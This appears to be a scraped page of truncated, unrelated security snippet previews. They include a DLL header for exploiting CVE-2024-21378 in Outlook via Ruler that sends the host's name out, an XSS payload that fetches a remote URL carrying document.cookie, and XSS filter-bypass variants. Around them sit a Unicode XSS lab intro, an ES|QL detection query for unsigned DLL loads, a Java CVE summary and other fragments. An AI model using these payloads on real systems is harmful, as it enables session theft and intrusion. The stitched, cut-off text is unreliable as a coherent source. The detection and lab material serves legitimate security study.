Nuclei Templates
/** | |
* This DLL is designed for use in conjunction with the Ruler tool for | |
* security testing related to the CVE-2024-21378 vulnerability, | |
* specifically targeting MS Outlook. | |
* | |
* It can be used with the following command line syntax: | |
* ruler [auth-params] form add-com [attack-params] --dll ./test.dll | |
* Ruler repository: https://github.com/NetSPI/ruler/tree/com-forms (com-forms branch). | |
* | |
* After being loaded into MS Outlook, it sends the PC's hostname and |
Most application security practitioners are familiar with Unicode XSS, which typically arises from the Unicode character fullwidth-less-than-sign. It’s not a common vulnerability but does occasionally appear in applications that otherwise have good XSS protection. In this blog I describe another variant of Unicode XSS that I have identified, using combining characters. I’ve not observed this in the wild, so it’s primarily of theoretical concern. But the scenario is not entirely implausible and I’ve not otherwise seen this technique discussed, so I hope this is useful.
Lab: https://4t64ubva.xssy.uk/
A quick investigation of the lab shows that it is echoing the name parameter, and performing HTML escaping:
// DLLs normally located in system32 but unsigned and loaded from elsewhere | |
// https://www.elastic.co/guide/en/elasticsearch/reference/master/esql-enrich-data.html | |
// example ENRICH libs-policy creation steps | |
https://gist.github.com/Samirbous/9f9c3237a0ada745e71cc2ba3425311c | |
ES|QL query: | |
from .ds-logs-endpoint.events.library-* | |
| where event.action == "load" and process.code_signature.status == "trusted" and dll.code_signature.status != "trusted" and |
Reflect.apply.call`${fetch}${window}${['https://poc.lol/?'+document.cookie]}` |
Vulnerability Summary: Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Swing). Supported versions that are affected are Oracle Java SE: 8u361, 8u361-perf, 11.0.18, 17.0.6, 20; Oracle GraalVM Enterprise Edition: 20.3.9, 21.3.5 and 22.3.1. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specifie
POST /api/v2/accounts | |
GET /api/v2/activities?since=cstest | |
GET /api/v2/audit_logs?filter[source_type]=cstest&filter[source_id]=1&filter[actor_id]=1&filter[ip_address]=cstest&filter[created_at]=cstest&filter[action]=cstest&sort_by=cstest&sort_order=cstest&sort=cstest | |
GET /api/v2/automations | |
POST /api/v2/automations | |
GET /api/v2/bookmarks | |
POST /api/v2/bookmarks | |
GET /api/v2/brands | |
POST /api/v2/brands | |
GET /api/v2/custom_objects |
import argparse | |
import typing | |
import math | |
from uuid import UUID | |
from pyasn1.codec.der import decoder | |
from pyasn1_modules import rfc5652 | |
from struct import unpack | |
from cryptography import utils | |
from cryptography.exceptions import AlreadyFinalized, InvalidKey | |
from cryptography.hazmat.primitives.kdf import KeyDerivationFunction |
INTIGRITI | |
@intigriti | |
Red circleLIVE MENTOR SESSION: | |
@TomNomNom | |
will answer your #BugBounty and tooling questions for the next 4 hours! Comment with your question! | |
https://twitter.com/intigriti/status/1258729529859768320 | |
Question from @amalmurali47 : |
<a[1]href[2]=[3]"[4]java[5]script:[6]alert(1)"> | |
[1] | |
Bytes: | |
\x09 \x0a \x0c \x0d \x20 \x2f | |
<a/href="javascript:alert(1)"> | |
<a\x09href="javascript:alert(1)"> | |
[2,3] |